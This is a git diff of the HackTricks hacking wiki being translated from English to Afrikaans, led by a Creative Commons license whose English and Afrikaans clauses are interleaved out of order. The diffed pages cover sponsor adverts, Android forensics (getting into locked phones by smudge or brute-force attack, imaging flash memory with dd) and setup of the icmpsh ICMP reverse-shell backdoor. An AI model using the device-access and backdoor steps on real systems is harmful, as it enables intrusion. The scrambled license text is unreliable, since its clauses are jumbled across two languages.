C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License.
b. as U al of 'n aansienlike gedeelte van die inhoud van die databasis insluit in 'n databasis waarin U Sui Generis Databasisregte het, dan is die databasis waarin U Sui Generis Databasisregte het (maar nie sy individuele inhoud nie) Aangepaste Materiaal; en
2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information.
c. U moet voldoen aan die voorwaardes in Artikel 3(a) as U al of 'n aansienlike gedeelte van die inhoud van die databasis deel.
3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable.
Vir die vermyding van twyfel, vul
## Artikel 7 - Ander Voorwaardes en Bepalings.
4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License.
a. Die Lisensiehouer sal nie gebonde wees aan enige bykomende of verskillende terme of voorwaardes wat deur U gekommunikeer word tensy uitdruklik ooreengekom.
## Section 4 Sui Generis Database Rights.
b. Enige reëlings, verstandhoudings of ooreenkomste met betrekking tot die Gelisensieerde Materiaal wat nie hierin vermeld word nie, is afsonderlik van en onafhanklik van die terme en voorwaardes van hierdie Openbare Lisensie.
Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
## Artikel 8 - Interpretasie.
a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only;
a. Ten einde twyfel te voorkom, verminder hierdie Openbare Lisensie nie, en mag nie geïnterpreteer word om, die gebruik van die Gelisensieerde Materiaal te beperk, beperk, beperk of voorwaardes op te lê wat wettiglik sonder toestemming onder hierdie Openbare Lisensie gemaak kan word nie.
b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material; and
b. Vir sover moontlik, as enige bepaling van hierdie Openbare Lisensie as onafdwingbaar beskou word, sal dit outomaties hervorm word tot die minimum mate wat nodig is om dit afdwingbaar te maak. As die bepaling nie hervorm kan word nie, sal dit van hierdie Openbare Lisensie afgesny word sonder om die afdwingbaarheid van die oorblywende terme en voorwaardes te beïnvloed.
c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database.
For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
## Section 5 Disclaimer of Warranties and Limitation of Liability.
a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__
c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
## Section 6 Term and Termination.
a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates:
1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or
2. upon express reinstatement by the Licensor.
For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License.
c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License.
d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
## Section 7 Other Terms and Conditions.
a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
## Section 8 Interpretation.
a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.
b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions.
c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor.
d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority.
c. Geen term of voorwaarde van hierdie Openbare Lisensie sal afgesien word nie en geen versuim om te voldoen sal toegestem word tensy uitdruklik ooreengekom deur die Lisensiehouer.
d. Niks in hierdie Openbare Lisensie stel 'n beperking op, of afstand van, enige voorregte en immuniteite wat van toepassing is op die Lisensiehouer of U nie, insluitend van die regsprosesse van enige jurisdiksie of gesag.
```
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

83
README.md
View file

@ -2,39 +2,39 @@
<figure><img src=".gitbook/assets/hacktricks.gif" alt=""><figcaption></figcaption></figure>
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks logo's & bewegingsontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
{% hint style="success" %}
**Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.**
**Welkom by die wiki waar jy elke haktruk/tegniek/wat ek geleer het van CTF's, werklike toepassings, navorsing en nuus sal vind.**
{% endhint %}
To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:**
Om te begin, volg hierdie bladsy waar jy die **tipiese vloei** sal vind wat **jy moet volg wanneer jy een of meer masjiene pentest:**
{% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %}
[pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md)
{% endcontent-ref %}
## Platinum Sponsors
## Platinum Borge
_Your company could be here._
_Jou maatskappy kan hier wees._
## Corporate Sponsors
## Korporatiewe Borge
### [STM Cyber](https://www.stmcyber.com)
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training.
[**STM Cyber**](https://www.stmcyber.com) is 'n uitstekende sibersekuriteitsmaatskappy met die leuse **HACK THE UNHACKABLE**. Hulle doen hul eie navorsing en ontwikkel hul eie hakwerkstukke om **verskeie waardevolle sibersekuriteitsdienste** soos pentesting, Rooi spanne en opleiding aan te bied.
You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
Jy kan hul **blog** besoek by [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
**STM Cyber** also support cybersecurity open source projects like HackTricks :)
**STM Cyber** ondersteun ook sibersekuriteit oopbronprojekte soos HackTricks :)
### [RootedCON](https://www.rootedcon.com/)
<figure><img src=".gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com) is die belangrikste sibersekuriteitsgeleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
@ -42,9 +42,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
**Intigriti** is die **#1** etiese hak- en **foutbeloningsplatform in Europa.**
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Foutbeloningswenk**: **teken aan** vir **Intigriti**, 'n premium **foutbeloningsplatform wat deur hakkers, vir hakkers** geskep is! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin belonings verdien tot **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -53,9 +53,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
<figure><img src=".gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome outomaties** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapswerkstukke.
Get Access Today:
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -63,13 +63,13 @@ Get Access Today:
<figure><img src=".gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Stay a step ahead in the cybersecurity game.
Bly 'n tree voor in die sibersekuriteitspel.
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, and prioritize issues that leave your systems most exposed so you can focus on what matters most.
[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) maak foutbestuur maklik. Hou jou aanvalsoppervlak dop, sien waar jou maatskappy kwesbaar is, en prioritiseer kwessies wat jou stelsels die meeste blootstel sodat jy kan fokus op wat die belangrikste is.
Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs and cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) and streamline DevOps so your team can implement fixes faster.
Voer duisende kontroles uit met 'n enkele platform wat jou hele tegniese stapel van interne infrastruktuur tot webtoepassings, API's en wolkstelsels dek. Integreer naadloos met [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) en stroomlyn DevOps sodat jou span vinniger herstelwerk kan implementeer.
Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site and take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
Intruder rus nooit nie. Rondom-die-klok beskerming monitor jou stelsels 24/7. Wil jy meer weet? Besoek hul webwerf en probeer dit uit met [**'n gratis toetslopie**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -77,26 +77,26 @@ Intruder never rests. Round-the-clock protection monitors your systems 24/7. Wan
<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hakkers en foutbeloningsjagters te kommunikeer!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Hakinsigte**\
Raak betrokke by inhoud wat die opwinding en uitdagings van hak insluit
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Realtydse Haknuus**\
Bly op hoogte van die vinnige hakwêreld deur realtydse nuus en insigte
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Nuutste Aankondigings**\
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hakkers!
***
### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
### [Pentest-Tools.com](https://pentest-tools.com/) - Die noodsaaklike penetrasietoetsingstoolkit
<figure><img src=".gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognosering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporing- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, dop te maak en pret te hê.
{% embed url="https://pentest-tools.com/" %}
@ -104,19 +104,18 @@ Stay informed with the newest bug bounties launching and crucial platform update
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
[**WebSec**](https://websec.nl) is 'n professionele sibersekuriteitsmaatskappy wat in **Amsterdam** gebaseer is en help om besighede **regoor die wêreld** teen die nuutste sibersekuriteitsdreigings te beskerm deur **offensiewe-sibersekuriteitsdienste** met 'n **moderne** benadering te bied.
WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more.
WebSec is 'n **alles-in-een sibersekuriteitsmaatskappy**, wat beteken dat hulle alles doen; Pentesting, **Sekerheids** Ouditse, Bewustheidsopleiding, Phishing-kampanjes, Kode-oorsig, Uitbuitingsontwikkeling, Uitbesteding van Sekuriteitskundiges en nog baie meer.
Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)!
'n Ander koel ding oor WebSec is dat hulle, in teenstelling met die bedryfsgemiddelde, **baie selfversekerd is in hul vaardighede**, tot so 'n mate dat hulle die beste kwaliteit resultate waarborg, dit staan op hul webwerf "**As ons dit nie kan hak nie, betaal jy nie daarvoor nie!**". Vir meer inligting kyk na hul [**webwerf**](https://websec.nl/en/) en [**blog**](https://websec.nl/blog/)!
In addition to the above WebSec is also a **committed supporter of HackTricks.**
Bo en behalwe die bogenoemde is WebSec ook 'n **toegewyde ondersteuner van HackTricks.**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## Lisensie & Vrywaring
## License & Disclaimer
**Check them in:**
**Kyk na hulle in:**
{% content-ref url="welcome/hacktricks-values-and-faq.md" %}
[hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md)
@ -124,14 +123,14 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

56
android-forensics.md
View file

@ -1,51 +1,51 @@
# Android Forensics
# Android Forensika
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
## Locked Device
## Geslote Toestel
To start extracting data from an Android device it has to be unlocked. If it's locked you can:
Om data uit 'n Android-toestel te onttrek, moet dit oopgemaak word. As dit gesluit is, kan jy:
* Check if the device has debugging via USB activated.
* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
* Kyk of die toestel USB-afdeling aktief het.
* Kyk vir 'n moontlike [smudge-aanval](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
* Probeer met [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
## Data Adquisition
## Data Verkryging
Create an [android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
Skep 'n [Android-back-up met adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) en onttrek dit met behulp van [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
### If root access or physical connection to JTAG interface
### As daar worteltoegang of fisiese verbinding met JTAG-interface is
* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
* `df /data` (Discover the block size of the system).
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
* `cat /proc/partitions` (soek die pad na die flitsgeheue, gewoonlik is die eerste inskrywing _mmcblk0_ en stem ooreen met die hele flitsgeheue).
* `df /data` (Ontdek die blokgrootte van die stelsel).
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (voer dit uit met die inligting wat ingesamel is van die blokgrootte).
### Memory
### Geheue
Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.
Gebruik Linux Memory Extractor (LiME) om die RAM-inligting te onttrek. Dit is 'n kernel-uitbreiding wat gelaai moet word via adb.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

54
backdoors/icmpsh.md
View file

@ -1,62 +1,50 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
Laai die agterdeur af vanaf: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
# Client side
# Kliëntkant
Execute the script: **run.sh**
**If you get some error, try to change the lines:**
Voer die skrip uit: **run.sh**
**As jy 'n fout kry, probeer om die lyne te verander:**
```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
```
**For:**
**Vir:**
```bash
echo Please insert the IP where you want to listen
read IP
```
